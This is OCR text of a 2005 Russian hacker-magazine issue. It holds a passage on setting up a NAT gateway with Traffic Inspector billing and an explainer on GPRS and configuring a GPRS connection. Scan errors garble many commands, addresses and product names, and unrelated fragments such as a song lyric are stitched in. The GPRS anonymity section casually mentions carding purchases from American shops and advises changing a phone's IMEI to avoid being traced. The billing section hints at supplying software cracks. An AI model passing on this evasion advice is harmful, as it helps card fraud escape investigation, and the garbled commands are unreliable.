участия сервера. Так что если в течение этого срока 
восстановить работу сервера не удастся, вся локалка 
на некоторое время уйдет в даун. Радости, сам пони- 
маешь, будет мало. 



оку подсети — 255.255.255.0 (по умолчанию ставится именно она), 
поле «Основной шлюз» оставляй пустым, а в качестве первичного 
□N5 прописывай ІР'шник внутреннего сетевого интерфейса. Кро- 
ме того, желательно во вкладке дополнительных свойств выста- 
вить первостепенный приоритет внутреннему интерфейсу. Это 
осуществляется черными стрелочками: жми так, чтобы внутрен- 
ний интерфейс оказался на самой верхней позиции. Замечу, что 
после отмены работы ЭНСР на всех клиентских машинах ІР-адре- 
са придется прописывать вручную. 

Конфигурация ІЧАТ'а на сервере закончена. Пришло время поза- 
ботиться о клиентских машинах. Если ты не отключал ЭНСР, то 
трогать по большому счету ничего не нужно — все настройки они 
получают от сервера автоматически. Но и в противном случае 
многого от тебя не требуется. Все, что нужно сделать, — подкор- 
ректировать свойства ТСР/ІР-протокола для сетевого интерфей- 
са (как правило, на клиентских машинах он один). Сперва 
необходимо указать машине уникальный ІР-адрес. Продолжая 
предыдущий пример, очевидно, что адреса нужно выбирать из 
диапазона 192.168.0.2 - 192.168.0.254. Если ты лично занимаешься 
организацией сети, то рекомендую во время выдачи ІР'шника за- 
писывать где-нибудь у себя имя компьютера и координаты хозяи- 
на, чтобы в случае проблем без труда можно было с ним связать- 
ся. Например если он уйдет в дикие долги по трафику :). Маску 
подсети следует выбирать точно такую же, как и у сервера, то 
есть 255.255.255.0, а в качестве основного шлюза и первичного 
(предпочитаемого) 0148-сервера указывать ІР-адрес внутреннего 
интерфейса сервера (192.168.0.1). 

Как видишь, ничего сложного нет, но эта система еще должна за- 
работать. Чтобы проверить работоспособность системы, выпол- 
ним несколько нехитрых действий. Для начала, с любой клиент- 
ской машины пропингуй внутренний ІР-адрес сервера (ріпд 
192.168.0.1) — как правило, на этом этапе проблем не возникает. 
Если же пинг не идет, то проблему нужно искать в настройках се- 
ти. Конфигурация І4АТ'а здесь не причем. В случае, когда все па- 
кеты доходят нормально, можно приступать к следующему этапу 
тестирования — пингованию ІР-адреса внешнего сетевого интер- 
фейса сервера (его можно узнать, набрав на сервере команду 
ірсопЛд /аіі). Работает? Отлично, тогда смело набирай ріпд 
ѵѵѵѵѵѵ.хакер.ги и жди результата. Если в ответ ты получишь что-то ти- 
па «и/и/и /.хакер. ги\ неизвестный узел», то, скорее всего, на клиент- 
ской машине неправильно указан ЭІ\ІЗ сервер. Ошибка «Превы- 
шен интервал ожидания для запроса» гласит о том, что удален- 
ный сервер недоступен. Прежде чем рвать на себе волосы и ис- 
кать очередную ошибку в настройках, убедись в том, что удален- 
ный сервак действительно функционирует, а не повален хакера- 
ми :). Ну а если пинг проходит нормально, можно себя поздравить 
и читать эту статью далее. 



[удалые помощники] Настроенный І\ІАТ — это еще только полови- 
на дела. Да, пользователи уже сейчас могут совершенно бе- 
спрепятственно пользоваться всеми благами общего интернет- 
канала. Но учет трафика не ведется, мониторинг израсходован- 
ных средств — тоже. Даже недругу доступ запретить не можешь. 
Для того чтобы организовать полноценный шлюз в инете, понадо- 
бится по меньшей мере еще одна программа — биллинг. В инете 
таковых выложено очень и очень много, тем не менее, особую попу- 
лярность в последнее время завоевал продукт от отечественных 
разработчиков — ТгаНІс Іпзресіог (тллл/.зппсііі-зоП.ги). ТІ состоит из 
нескольких компонентов: сервера, консоли управления и клиент- 




[настройки протокола ТСР/ІР для 
внутреннего соединения сервера] 




[конфигуратор Тга^іс Іпзресіог’а 
в действии!] 
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[именно так происходит изменение заголовков пакета после прохожде- 
ния через ЫДТ. В ЫАТ-таблицу записывается соответствующая запись] 

ского агента. Все они выполняют свои определенные функции. 
Для работы в составе маршрутизатора устанавливается сер- 
верная часть программы, а также консоль управления для ее 
настройки. На основе сервера реализован точный механизм 
учета трафика, который способен считать трафик по всем без 
исключения протоколам. Помимо этого, ТІ имеет полноцен- 
ную систему биллинга с возможностью не только вести фи- 
нансовый отчет по каждому из пользователей и вводить гибкие 
тарифные планы, но еще и устанавливать режимы блокировки 
(за неуплату и т.д.), работы в кредит и оплаты по карточкам. 
Другая важная часть продукта — агент, который устана- 
вливается и работает на машине клиента. Основная его за- 
дача — авторизировать клиентское подключение на сер- 
вере с помощью логина и пароля. При этом разработчики 
не забыли о безопасности и реализовали передачу паро- 
лей в криптованном виде, так что отснифать их невозможно. 
Помимо непосредственной авторизации, клиентский агент 
используется для отображения баланса лицевого счета, а 
также автоматической конфигурации Іпіегпеі Ехріогег'а. 
Примечательно, что от администратора не требуют устана- 
вливать ее на каждой машине вручную — для этого имеется 
утилита, которая удаленно и массово поставит ее на все 
компьютеры в сети. 

[тт — тюним трафинспекгор] Для установки и настройки ТгаІТіс Іп- 
зресіог'а много не надо — всего лишь 15-метровый дистрибутив 
и часок грамотной настройки. Установщик программы выполнен 
предельно стандартно, и никаких заковырок в нем нет. Един- 
ственное замечу, что на одном из этапов мастера нужно будет 
выбрать тип установки. Указывай «Сервер» — не ошибешься! 
После установки необходимо запустить консоль управления 
программы — это головной ее мозг. Именно отсюда осу- 
ществляются все настройки, которые потом будут учитывать- 
ся во время подсчета трафика и денежек пользователей. На- 
страивать сервер мы начнем прямо сейчас, так что кликай 
по яркой надписи «Конфигуратор» и жди появления мастера. 
Щ Первый шаг предлагает указать топологию сети. Так как 
на серверном компьютере используется и внешнее, и вну- 
треннее соединения, то и из предложенных вариантов нуж- 
но выбрать соответствующий пункт. 

Ц] На втором шаге необходимо указать внутреннее сетевое 
подключение. Мудрить здесь не надо: просто поставь галоч- 
ку напротив названия нужного соединения, а тип сети вы- 
ставь локальным. Кнопка «Выбрать с интранет ІР-адресами» 
автоматически подключит все внутренние сети. 

[з] Следующий шаг — настройка прокси и сервера веб-стати- 
стики. Вся настройка, впрочем, сводится к указанию портов, на 
которых они будут работать. В общем случае можно ничего не 
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Жил-был на свете Антон Г ородецкий, 

Бросила жена — он грустил не по-детски. 
Пришел к колдунье: А ну-ка наколдуй мне! 
Легко, мой хороший, только хлопну в ладоши, 

И жена вернется, от того отвернется, 

И маленькая жизнь внутри нее оборвется... 

Но вдруг налетели на ведьму тени, 

Приведенья, говорят: "Не бывать преступленью ! 1 
Ну что же ты, что ты потупила взор? 

Сдавайся, ведьма — Ночной Дозор. 



[добавляем нового клиента] 



ѵѵѵѵѵѵ.дІасіаІІесИ.ги 
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[сервер или консоль? Выбор невелик...] 

трогать ибо все замечательно будет работать и без твоей помощи. 
0 Четвертый пункт мастера подразумевает выбор внешнего се- 
тевого интерфейса. Полный аналог второго пункта. 

Ц] Следующий раздел имеет две важные настройки. Во-первых, ма- 
стер предлагает включить встроенный в программу файрвол, а от- 
казывать ему не стоит :). А во-вторых, здесь же доступна опция, ко- 
торая позволяет получать и отправлять данные по разным внешним 
интерфейсам. В нашем случае она, разумеется, не нужна (внешний 
сетевой интерфейс у нас один), но вполне может пригодиться во 
время настройки общего соединения через спутниковый канал. 

[б] Последний шаг мастера активизирует работу ЗМТР-шлюза. Ну- 
жен он тебе или нет — решай сам. Но учти, что для его работы 
придется ставить свой собственный почтовый сервер. 

После завершения работы мастера в консоли управления дол- 
жна обновиться таблица с установленным интерфейсом. Если так 
и есть, то приступаем к следующему — к добавлению клиентов. 
Для этого раскрывай в дереве-меню раздел «ТгаІТіс Іпзресіог» и 
выбирай пункт «Внутренние сети», после чего кликай по надписи 
«Добавить клиента». В появившемся окне доступны самые разно- 
образные настройки клиента: его имя, способ авторизации, вре- 
мя доступа, ограничения по скорости и т.д. Все настройки четко 
структурированы и разбиты по вкладкам, разобраться с ними не 
составит труда и без моих комментариев. Кстати, чтобы не на- 
страивать каждого пользователя по отдельности, их можно опре- 
делить в группу и один раз задать ей все необходимые настройки. 
Авторизацию пользователя можно производить по-разному. В 
случае аутентификации по ІР или МАС-адресам, никаких допол- 
нительных средств со стороны клиента не нужно, что, конечно же, 
очень хорошо. Но с другой стороны, что мешает пользователю из- 
менить свой ІР или МАС-адрес и юзать инет за чужой счет? Прак- 
тика показывает, что ничего! В плане безопасности приоритетнее 




[во время установки ТгаШс Іпзресіог’а система предложит установить 
сетевой драйвер. Отказываться ни в коем случае нельзя, иначе программа 
просто не будет работать] 



использовать аутентификацию по доменной учетной записи или 
идентификацию по логину/паролю. Контроллера домена у нас 
нет, поэтому нам идеально подойдет второй вариант. Каждый 
клиент может загрузить агента удаленно с локального веб-серве- 
ра программы по адресу ЫТр://192. 168.0. 1:8080. Помимо этого, 
админ может установить агента на клиентские машины удаленно — 
неоценимую помощь окажет специальная утилита ТгаІТіс Іпзрес- 
іог СІіепі Ретоіе ІпзіаІІег ( ѵѵѵѵід/. зтагі-зо /?. гілвО/'ГіІез/ТгІпзрІІі.гір) . 
После того как агент ТІ будет установлен, в его настройках, поми- 
мо всех идентификационных данных, необходимо указать адрес 
сервера во внутренней сети. Все, теперь клиент может работать! 

[дополнительные возможности] Меня лично очень порадовала 
возможность удаленного администрирования ТІ с помощью уда- 
ленной консоли (для ее установки нужно выбрать соответствую- 
щий режим во время инсталляции программы). Можно один раз 
грамотно сконфигурировать сервак и убрать его с глаз долой. 
Например в железный ящик на чердак, а пополнять балансы юзе- 
ров и вносить коррективы в конфигурацию уже удаленно. 

ТгаІТіс Іпзресіог также имеет очень широкие возможности по огра- 
ничению доступа к ресурсам интернета. Если возникнет необхо- 
димость, можно, например, ограничить доступ к специфическому 
контенту или запретить использование инета в определенное вре- 
мя. Чтобы кто-то из юзеров не забивал внешний канал под завязку, 
в программе предусмотрен шейпер, который с удовольствием по- 
режет максимально доступную скорость. При этом не надо долго 
ковыряться в каких-то конфигах. Все хозяйство элементарно под- 
нимается с помощью тех же профилей пользователей и групп. 
Стоит также отметить кэширующий НТТР/351_/ЕТР/ЗОСКЗ прокси- 
сервер, который наверняка сослужит хорошую службу тем, кто хо- 
чет сэкономить трафик. Радует то, что каждый пользователь вправе 
сам задавать для себя параметры кэширования и использования 
данных из кэша. Помимо всех остальных стандартных примочек, 
встроенный прокси-сервер поддерживает функцию каскадирова- 
ния трафика на другую проксю. Лично мне это позволило наладить 
совместную работу ТІ и утилиты-ускорителя спутникового канала 
ѲІоЬах (и/и/илд/оЬах./п/о). А укрепить позиции сервера помог 
встроенный файрвол, который закрыл все ненужные порты. 
Впрочем, наряду со всеми достоинствами, программа имеет и 
ряд недостатков (а у кого их нет?). Начать стоит с того, что ути- 
лита еще относительно новая, и поэтому в ней по-прежнему 
постоянно находят массу багов и ошибок. Их правят-правят, а 
они все появляются и появляются. Бывает и так, что программа 
сбоит, а иногда и вовсе очень сильно нервничает, например, 
из-за присутствия на машине сторонних файрволов. Вдобавок 
ко всему, она, как и любая другая софтина этого класса, про- 
дается за деньги, а отечественные разработчики доблестно 
следят за появлением кряков и лоадеров. Временное решение 
проблемы — использование тридцатидневного триального 
ключа, который выдается на сайте производителя. Но потом 
все равно придется искать лекарство. Впрочем, с этим я тебе, 
возможно, помогу. Пиши. 

[в заключение] Описанная мною схема хоть и является вполне ра- 
бочей и функциональной, но все-таки не тянет до предела мечта- 
ний. Такая связка оптимально подходит для небольших и средних 
локалок домашнего пользования, но никак не для корпоративных 
сетей. Сам бы я ни за что не стал использовать ее на работе, где 
в моем подчинении находятся сотни компьютеров. Это уже удел 
серьезных серверных осей и дорогостоящего биллинга (ЕгееВЗЭ 
+ ІІТМ, к примеру), но это уже совсем другая история © 
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[консоль ММС для управления ТІ] 
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МИНЗДРАВ РОССИИ ПРЕДУПРЕЖДАЕТ: КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 






ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_2(ЖЕ РЕВВІІМ НЬЮСЫ 






КОГДА СОТОВАЯ СВЯЗЬ ТОЛЬКО ЗАРОЖДА- 
ЛАСЬ, МОБИЛЬНЫЕ ТЕЛЕФОНЫ ПРЕДСТАВ- 
ЛЯЛИ СОБОЙ ГРОМОЗДКИЕ И УБОГИЕ ЧЕ- 
МОДАНЫ, ДОСТУПНЫЕ ЛИШЬ САМЫМ ОБЕС- 
ПЕЧЕННЫМ ЛЮДЯМ СТРАНЫ. ПРОШЛО НЕС- 
КОЛЬКО ЛЕТ, И МОБИЛЬНИКОМ В РУКАХ 
ХВАСТАЕТСЯ ЧУТЬ ЛИ НЕ КАЖДЫЙ ВТОРОЙ 
ПЕРВОКЛАССНИК. СОТОВЫЙ ТЕЛЕФОН СТАЛ 
ТАКОЙ ЖЕ НЕОТЪЕМЛЕМОЙ ВЕЩЬЮ В НА- 
ШЕЙ ЖИЗНИ, КАК, НАПРИМЕР, ЗУБНАЯ ЩЕТ- 
КА, А ПРЕДОСТАВЛЯЕМЫЕ ОПЕРАТОРАМИ 
ВОЗМОЖНОСТИ СИЛЬНО РАСШИРИЛИСЬ. 
НЫНЧЕ НИКОГО НЕ УДИВИШЬ МОБИЛЬНЫМ 
ИНЕТОМ ЧЕРЕЗ ѲРВЗ, ЗАТО ЗНАНИЯМИ, КАК 
ЭТА ТЕХНОЛОГИЯ РАБОТАЕТ, ВЛАДЕЮТ 

НЕМНОГИЕ I Степан Ильин ака З+ер (зТер@геаІ. хакер. ги) 



Технология жпрс изнутри 

[о чем речь?] Пакетная радиосвязь общего назначе- 
ния 0РР5 (ОепегаІ Раскеі Расііо Зегѵісе) — это техно- 
логия, позволяющая передавать пакеты протокола ІР 
в уже существующих сотовых сетях. На основе этой 
технологии операторы сотовой связи предлагают це- 
лый ряд услуг и, прежде всего, услугу мобильного ин- 
тернета. Ты можешь серфить сайты, работать с элект- 
ронной почтой, а также часами просиживать в 
ІРС/ІСО с помощью любого устройства в связке с мо- 
бильным телефоном. Будь это устройство компьюте- 
ром, ноутбуком, КПК или же самим телефоном — не- 
важно! Фишка в том, что этот интернет мобильный! 
Впервые технология 0РР5 появилась в американских 
сетях 5-136 ТОМА (Тіте Эіѵізіоп Миіііріе Ассезз — мно- 
жественный доступ с разделением каналов) и евро- 
пейских 05М (0ІоЬаІ Зузіет Іюг МоЬіІе 
Соттипісаііопз — глобальная система связи с под- 
вижными объектами). И сразу же она завоевала попу- 
лярность. Главная ее особенность заключается в том, 
что информация передается не целиком, а делится 





Для обеспечения собственной безопасности многие сейчас используют ѴРІ\І-сервисы. Так вот, в связке с 6РР8 у них определенно возникнут проблемы, 
так как ОпСоСы из своих собственных соображений не пропускают через 6РР8 шифрованный ѴРИ-трафик. Но не беда: ОрепѴРИ (шшш.орепѵрп.пеі) 
спасет отца русской демократии :). 



[КАК НАСТРОИТЬ ѲРВЗ-СОЕД МНЕНИЕ] 

Ш Для начала нужно подключить телефон к 
компьютеру и установить все необходимые дро- 
ва. Здесь все зависит от модели телефона, мето- 
да подключения (дата-кабель, инфракрасный 
порт или ВІиеІооІН), то есть описывать что-то 
конкретно, по крайней мере, глупо. Необходимая 
документация и дрова традиционно выкладыва- 
ются на сайтах производителей. 

@ После того как дрова будут установлены и 
трубка обозначится в твоей системе как обычный 
модем, необходимо задать ей один важный пара- 
метр — строку инициализации. Для этого заходи 
в свойства появившегося модема (обычно он 



обозначается как ѲРВЗ оѵег СОМ или что-то 
вроде того), переходи на вкладку с дополнитель- 
ными параметрами связи и в единственной дос- 
тупной графе пиши следующее: АТ+СѲО- 
СОМТ=1, ІІ ІР ІІ ,"іпІегпе1.ппс 11 . Эта строка актуальна 
для абонентов Мегафона центрального региона. 
Если у тебя другой оператор, за инструкцией сто- 
ит обратиться в службу поддержки или посмот- 
реть на официальном сайте. Там всегда есть вся 
необходимая информация. 

[з] Последний штрих — создание самого обык- 
новенного диалап-соединения. В настройках 
нужно указать мобилу в качестве модема, а 
также номер телефона, логин и пароль, взятые 
с сайта опсоса. 






шшш.ііпихгзр.ги/агііс/дргз.іііті — настраиваем 6РР8-соединение в пингвине (на примере Ѳепіоо Ыпих). 
шуѵуі.дргв-дзш.ги — информативный сайт обо всем, что так или иначе касается технологии 6РР8. 
шшш.дзтшогШ.сотАесйпоІоду/дргз — официальный сайт 6РР8. 

ѵѵѵѵѵѵ.іесІюпІіпе.сот/рсН/раѵіІІіопзАпіеІ/дргз.рсН — неплохое описание технологии на английском. 




[АНОНИМНОСТЬ ЧЕРЕЗ ОРВЗ] 

Настало время поговорить об анонимности, которой 
можно достичь, используя службу ОРВЗ. Широко 
распространено мнение о том, что приобретенная на 
любом радиорынке ЗІМ’ка может гарантировать 100% 
безопасность. На самом же деле это не совсем так. Я 
бы даже сказал, что это далеко не так. 

Не секрет, что местоположение абонента ОЗМ-сети во 
время сеанса связи можно определить с достаточно 
высокой точностью. В частности, там, где абонент на- 
ходится в поле зрения сразу нескольких базовых стан- 
ций, это сделать особенно просто. Хорошим подтверж- 
дением моих слов является новая услуга от Мегафона, 
позволяющая определить примерное местонахождение 
любого абонента сети. Сам посуди: если такое может 
сделать обычный смертный, то специальные службы 
смогут и подавно. Разумеется, при желании можно ис- 
пользовать ОРВЗ, передвигаясь на машине, но это 
уже я называю анонимностью для гурманов :). 



Каждый раз во время регистрации телефона в сети 
(читай, его включения) в логах оператора записывает- 
ся идентификационный ІМЕІ трубки, и об этом тоже не 
стоит забывать. Если ты долгое время юзал телефон 
для разговоров с ЗІМ-картой, зарегистрированной на 
твое имя, а потом вставил чужую и скардил пару-трой- 
ку вещей в американских шопах — считай, что ты се- 
бя сдал. В случае необходимости ОпСоСу не составит 
труда найти записи о том, как использовался твой те- 
лефон ранее. К счастью, на многих телефонах ІМЕІ- 
код можно поменять, что полностью разрешает эту 
проблему. 

Как понимаешь, чужие ЗІМ’ки — вещь достаточно 
ценная, на которую всегда есть спрос. Если ты не хо- 
чешь, чтобы к тебе пришли сотрудники отдела «К» и 
предъявили обвинение в действиях, к которым ты не 
имеешь отношения, всегда сообщай о пропаже теле- 
фона. Это избавит тебя от маловероятных, но все-та- 
ки возможных проблем. 



[хакер 04 [76] 05 031 ] 




[хакер 04 [76] 05 032 ] 




[телефон после установки всех необходимых драйверов обозначится в системе как обычный модем] 




[строка инициализации. Без нее система 
работать не будет] 

на небольшие пакеты, после чего отправ- 
ляется одновременно по нескольким ка- 
налам. Это позволило достичь доселе не- 
виданной скорости передачи данных — 
171 Кбит/с. 

Для того чтобы ощутить все преимущества 
такого подхода, предлагаю заглянуть в 
прошлое и посмотреть, как передавались 
данные в 05М до появления 0РР5. Зрели- 
ще, прямо скажу, жалкое. Для отправки 
цифровой информации абоненту не пре- 
доставлялся отдельный канал, а исполь- 
зовался тот же, что и для звонков голосом. 
А так как передача осуществлялась обыч- 
ным модемом, встроенным в мобильный 
телефон, то линия, как и в случае диалапа, 
оставалась занятой на протяжении всего 
времени соединения. К тому же, скорость 
передачи не превышала 9,6 Кбит/с, что 
даже тогда не вписывалось в понятие при- 
емлемой скорости. 

Пакетный подход к передаче данных во 
многом исправил эти недостатки. Исполь- 
зование 0РР5 подразумевает, что данные 
передаются маленькими кусочками в виде 
специальных пакетов. Причем последние 
не отправляются наобум — напротив, они 
идут по четкому маршруту, используя сво- 
бодные каналы, которые в данный момент 
не заняты абонентами для разговора. Как 
понимаешь, это выгодно не только пользо- 
вателям, но и сотовому оператору, кото- 
рый максимально рационально использу- 
ет сеть. Параллельная передача данных, в 
свою очередь, также приносит плоды. 
Вспомни многочисленные интернет-качал- 
ки (Ре0еі, Р1ез1я0еі и т.п.), поддерживаю- 
щие многопоточную закачку файлов. Так 
вот, в 0РРЗ применяется аналогичный 
принцип, но на уровне протокола. 

[вскрытие покажет] Изначально техноло- 
гия 0РР5 разрабатывалась для того, чтобы 
динамически и равномерно распреде- 
лять ресурсы сотового оператора. Если к 
одной соте сразу подключается предель- 
ное количество пользователей, что вполне 



вероятно для больших городов, и она не 
справляется с таким объемом голосового 
трафика, станция 0РРЗ позаимствует ре- 
сурсы у соседних сот. В результате поль- 
зователи 0РР5 могут обслуживаться не од- 
ной, а сразу несколькими сотами 05М од- 
новременно, если возникнет такая необ- 
ходимость. 

Поддержка 0РР5 в 03М-сетях появилась 
далеко не сразу — очень многое приш- 
лось дорабатывать и адаптировать. Преж- 
де всего, необходимо было обновить ус- 
таревшее оборудование, причем повсе- 
местно. Этим во многом и объясняется то, 
что 0РРЗ до сих пор доступен далеко не 
во всех регионах. Москвичам, возможно, 
покажется это дикостью, но в Калужской 
области коммерческая эксплуатация 
0РР5 долгое время была доступна только 
абонентам Билайна. Во время написания 
статьи ее ввел и Мегафон, а МТС до сих 
пор остается не у дел, хотя и кормит обе- 
щаниями своих абонентов на протяжении 
вот уже второго года. 

Попробуем разобраться, что представляет 
собой технология 0РР5 изнутри. Вся систе- 
ма состоит из двух основных частей: из сис- 
темы базовых станций и ядра сети 0РРЗ 
(0РЗ Соге Ыеі\л/огк). Система базовых стан- 
ций нужна не только для 0РР5, но и для 03М 
в целом: она включает в себя адаптирован- 
ные ретрансляторы, которые, помимо все- 
го прочего, под держивают передачу пакет- 
ных данных на программном и аппаратном 
уровне. Ядро 0РР5 — это совсем другая ис- 
тория. Оно состоит из целого ряда специ- 
альных сетевых средств, предназначенных 
для обработки пакетов и обеспечения вза- 
имодействия с инетом. 

Самые главные его компоненты — 503М 
(Зегѵіпд 0РР5 Зиррогі ІМосІе — узел подде- 
ржки 0РР5) и 005М (0аіе\л/ау 0РРЗ 
Зиррогі ІЧІосІе — шлюзовой узел 0РР5). Ког- 
да какой-нибудь пользователь 0РРЗ со- 
вершает звонок, он связывается с базовой 
станцией 03М, которая, в свою очередь, 
передает управление узлу 305ІМ. Во всех 
этих аббревиатурах можно запутаться, но 
на самом деле ничего сложного тут нет. 
503Ы — это основной управляющий модуль 
0РР5, своеобразный аналог коммутатора 
05М. Именно он занимается транспорти- 
ровкой пакетов, оставляя обычному комму- 
татору только его родной голосовой трафик. 
Для того чтобы установить 0РРЗ-соедине- 
ние, пользователю, разумеется, необходи- 
мо пройти специальную идентификацию. 
Для этого 503И обращается к специально- 
му серверу-реестру абонентов (узел НІ_Р) с 



запросом о выдаче пользователю необхо- 
димых для соединения полномочий, на что 
получает однозначный ответ, разрешена ли 
пользователю такая услуга или, напротив, 
недоступна. На этом функции 303Ы не за- 
канчиваются. Даже после успешной авто- 
ризации юзер все равно остается у него 
под колпаком: узел постоянно ведет мони- 
торинг находящихся опііпе пользователей и 
отслеживает маршруты перемещения або- 
нента. Это делается не прикола ради, а для 
того, чтобы иметь возможность надлежащим 
образом распределять ресурсы и соби- 
рать всю необходимую информацию для 
биллинга (учета переданного трафика и его 
оплаты). 

Стоит отметить, что на пути между базовой 
станцией и 505Ы есть еще один промежу- 
точный узел — контроллер базовых стан- 
ций ВЗС (Вазе Зіаііоп СопігоІІег). Первона- 
чально данные от пользователя попадают 
именно туда, а уже потом посредством 
РСІІ (Раскеі СопігоІ ІІпіі — устройство 
контроля пакетной передачи) отправляют- 
ся на 305Ы. 

Связь между сотовой сетью и внешними 
информационными сетями (интернетом, 
другими 0РР5-системами и т.д.) обеспе- 
чивает шлюзовой узел 005І\І. Эта важная 
часть инфраструктуры 0РРЗ является сво- 
еобразным роутером данных, на который 
возложены все функции маршрутизации. 
Когда мобильный пользователь посылает 
данные, 505М направляет пакеты на соот- 
ветствующий узел 005ІЧ а тот, в свою оче- 
редь, — во внешнюю сеть. 

За счет того, что 003Ы выдает каждому 
пользователю динамический ІР-адрес 
(своеобразный аналог ЭНСР-сервера), 
обратный процесс выполняется не менее 
просто. В дальнейшем это позволяет иден- 
тифицировать внешние пакеты, предназна- 
ченные для пользователя, и автоматически 

[Задет МС-850 — пер- 
вый в мире телефон 
с поддержкой ѲРВЗ] 





[соединение установлено] 




[маршрут, который проходят пакеты, чтобы 
попасть во внешнюю сеть] 








[полная схема работы ѲРРЗ] 



находить обслуживающий его узел подде- 
ржки 303ІЧ. В свою очередь, 303ІЧ получив 
пакеты, отправляет их на базовую станцию, 
в зоне действия которой находится пользо- 
ватель. Нельзя умолчать о том, что для про- 
дуктивного взаимодействия двух основных 
модулей системы 303Ы и 003Ы был разра- 
ботан специальный протокол 0ТР (0РР5 
Типпеііпд РгоіосоІ), в основе которого ле- 
жат общие принципы широко распростра- 
ненных протоколов ТСР/ІР. 

Относительная простота системы 0РРЗ 
предоставляет отличные возможности 
масштабирования. Так, в случае появле- 
ния потребности в расширении опера- 
тор вполне может увеличить емкость сис- 
темы за счет установки новых узлов под- 
держки (305ІМ). А дополнительные 005Ы 
гарантированно решат проблему чрез- 
мерно большого количества трафика и 
расширят пропускную способность сис- 
темы в целом. 

[что нужно для использования?] В принципе, 
немногое — всего-навсего сотовый теле- 
фон с поддержкой 0РР5. Если ты не явля- 
ешься счастливым обладателем аппарата 
доисторической древности, то считай, что 
она у тебя есть. Благо поддержка 0РР5 уже 
давно вошла в список стандартных возмож- 
ностей телефона. О ней нынче даже в срав- 
нительных обзорах трубок не упоминают. 

С другой стороны, нельзя сказать, что все те- 
лефоны имеют совершенно одинаковые воз- 
можности. Стандарт 0РР5, вообще говоря, 
разделяет все мобильные терминалы на три 
класса в зависимости от их возможностей. 
Класс А. Устройства, относящиеся к это- 



му самому высокому классу, позволяют 
одновременно общаться по телефону го- 
лосом и использовать его для передачи 
данных в режиме 0РР5. 

Класс В. Эти девайсы на порядок слабее, 
так как единовременно могут использо- 
ваться либо для телефонных звонков, либо 
для работы в интернете. Как говорится, 
придется выбирать. 

Класс С. Единственное, что могут предло- 
жить устройства класса С — передачу 
данных в пакетном режиме. К этому клас- 
су, в частности, относятся 0РР5-модемы и 
модули РСМСІА для ноутбуков. 

Что касается скорости соединения, то она 
напрямую зависит от способностей самих 
телефонов. Если быть точным, то от количест- 
ва тайм-слотов (проще говоря, потоков), ко- 
торые аппарат под держивает на прием и пе- 
редачу. Поскольку пользователи большую 
часть времени получают данные, а не пере- 
дают их, то и количество потоков, выделенных 
на прием и на передачу, сильно отличается. 
Стандартными комбинациями являются 2 (на 
прием) + 1 (на отдачу), 3+1, 4+1 . Хотя встреча- 
ются и другие варианты, например 3+2. 
Максимальная скорость передачи данных, 
заявленная стандартом 0РР$, составляет 
170 Кбит/с. Однако на практике достичь 
столь высоких скоростей совершенно не- 
возможно. На то есть несколько причин. Во- 
первых, приведенный показатель скорости 
не предусматривает необходимости при- 
менения алгоритмов коррекции ошибок, 
следовательно, и неотъемлемой избыточ- 
ности данных. Во-вторых, он рассчитан для 
случаев, когда используются сразу все во- 
семь тайм-слотов. А поскольку для переда- 



чи 0РР5-данных доступны не все восемь, 
а максимум четыре потока, то лучшее, на 
что приходится надеяться, — 53,6 Кбит/с (4 
тайм-слота по 13,4 Кбит/с каждый). Хотя в 
любом случае даже этот результат гораздо 
лучше, чем скорость 9,6 Кбит/с, которую 
могли предложить ранее существовавшие 
технологии передачи данных. 

Помимо значительно увеличенной скорос- 
ти, рядовой пользователь получил другое 
важное преимущество — непрерывное 
соединение с инетом. До появления 0РР5 
абонентам приходилось полностью опла- 
чивать время, проведенное на линии, неза- 
висимо от степени загрузки канала. Рабо- 
тая с 0РР5, абонент, наоборот, оплачива- 
ет только объем переданных данных, но 
никак не эфирное время. Если ты хочешь 
сутками напролет сидеть в ІСО и ІРС, пус- 
кай даже с экрана смартфона или КПК, то 
0РРЗ — это именно то, что нужно. Ведь ты 
оплачиваешь только трафик. 

С другой стороны, длительные соединения 
предъявляют повышенные требования к се- 
ти. Так, для обеспечения оперативной 
маршрутизации оператору крайне необ- 
ходимо получать данные о месторасполо- 
жении и передвижениях абонента. Как ва- 
риант, можно периодически опрашивать 
абонента. Но часто передаваемая техни- 
ческая информация значительно бы увели- 
чила абонентский трафик и, что еще хуже, 
расход аккумуляторов терминалов. Чтобы 
снизить очевидные затраты, была разрабо- 
тана специальная схема: точность опре- 
деления местонахождения абонента зави- 
сит, прежде всего, от его текущего статуса. 
Всего их три: РЕАЭѴ (активный), ЗТАШВѴ 
(ожидающий), ЮІ_Е (неактивный). Я распо- 
ложил их в порядке уменьшения точности. 

[не все так шоколадно] Не секрет, что со- 
вершенно идеальных технологий не быва- 
ет. Несмотря на все прелести 0РРЗ, у нее 
есть еще и несколько недостатков, о кото- 
рых нельзя забывать. 

Ш Максимально возможные скорости ос- 
таются пока исключительно теоретичес- 
кими. На практике максимум, который 
удается выжать, — это стабильные 4-6 
Кб/с, да и то при условии уверенного и ус- 
тойчивого приема. 

{ 2 } Потери пакетов во время радиопереда- 
чи — вполне обычное явление. Технология 
0РР5 активно использует алгоритмы избы- 
точности данных, чтобы гарантировать це- 
лостность передаваемой информации. 
Но они же могут и увеличить задержки, 
причем значительно. 

[з] Звонки голосом и 0РР5 используют одни 
и те же ресурсы, и если ресурсы заняты од- 
ним, то это мешает нормальной работе дру- 
гого сервиса. Приоритет традиционно от- 
дается голосу, поэтому не приведи господь 
тебе использовать 0РР5 во время каких-ни- 
будь праздников и прочих событий, когда 
ресурсы ОпСоСа забиты по самое не хочу. 
Ничего хорошего не выйдет — проверено. 
Текущие недостатки 0РР5 обещают устра- 
нить в сетях нового, третьего (30) поколе- 
ния. К ним, в частности, относится стандарт 
ІІМТЗ (ІІпіѵегзаІ МоЬіІе Теіесоттипісаііопз 
Зузіет), который позволяет передавать 
данные на скорости до 2 Мбит/с. Скорость, 
опять же, чисто теоретическая, но все рав- 
но мы таких возможностей с нетерпением 
ждем. Даже очень © 
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[Наглядная иллюстрация того, как использование сразу нескольких тайм-слотов увеличивает 
пропускную способность] 
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Сам себе хостер 

ЗАЙДЯ В РАЗДЕЛ «ХОСТИНГ» ЛЮБОГО ТЕМА- 
ТИЧЕСКОГО КАТАЛОГА, ТЫ УВИДИШЬ ДЛИН- 
НЫЙ СПИСОК ИЗ ДВУХ, А ТО И ТРЕХ ТЫСЯЧ 
